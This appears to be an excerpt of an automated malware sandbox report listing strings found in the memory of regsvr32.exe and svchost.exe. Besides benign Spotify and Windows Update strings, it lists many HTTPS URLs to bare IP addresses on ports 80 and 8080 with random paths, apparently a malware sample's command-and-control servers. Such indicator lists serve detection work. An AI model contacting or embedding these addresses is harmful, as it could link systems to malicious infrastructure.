                      Source: svchost.exe, 00000017.00000003.375394454.0000015C8A76F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000017.00000003.375394454.0000015C8A76F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375413420.0000015C8A780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: svchost.exe, 00000017.00000003.375394454.0000015C8A76F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375413420.0000015C8A780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000006.00000003.364680383.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421711170.0000015C8A700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000014.00000002.665412089.000001697FE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.421495587.0000015C89EEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 00000006.00000003.728308506.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762712850.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000003.723777902.0000000004EBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?75939ced2d84a
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en;T
                      Source: svchost.exe, 00000017.00000003.396728134.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000E.00000002.314090796.000001ECDFA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000C.00000002.762160897.00000276B2E44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247/Certificates
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247/Global
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLE3062332-1002
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLEr
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.221.221.247:8080/i
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/d
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/m
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183/rosoft
                      Source: regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/
                      Source: regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/$v6/
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/YQXxdxwQWLyBEVjMOlg
                      Source: regsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://120.50.40.183:80/za
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://131.100.24.231/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoaw
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://131.100.24.231:80/MIMNtRZxLqGHZoTXVDtaMauEeLlGAjcyCUbpgyHmvtdbZTHIDbPoawrlp
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/Q4
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.128.192/SSYKvnZUOEUlRtjgPVsscjkUTaNTgTQQvJUHkyX-
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.8.59.82/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.8.59.82:8080/AgctwBgxIsTEnzPyqHwVtfcFB
                      Source: regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63/
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63:8080/5
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63:8080/E
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.218.63:8080/lksHycwarnaSRJQsEAZwtocdkTVZGajE
                      Source: regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.254.208.91/
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOT
                      Source: regsvr32.exe, 00000006.00000003.410649801.0000000002BEC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.365020565.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.254.208.91:8080/iqyyOTGODIozOxlzJCOa
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211:8080/
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211:8080/cal
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://185.157.82.211:8080/r
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/27.42.236/h
                      Source: regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/5563209-4053062332-1002
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/:
                      Source: regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/F
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://192.99.251.50/njigQUBviBvfjJoFmpOFCcuxzCMjisKOYgnAJJuZGrOYExdzIkjfPaaGvSwrlp
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92/
                      Source: regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92/7
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92/X
                      Source: regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.188.212.92:8080/WvwiYegTHwVudezOCrWPjYKhpMeUQep
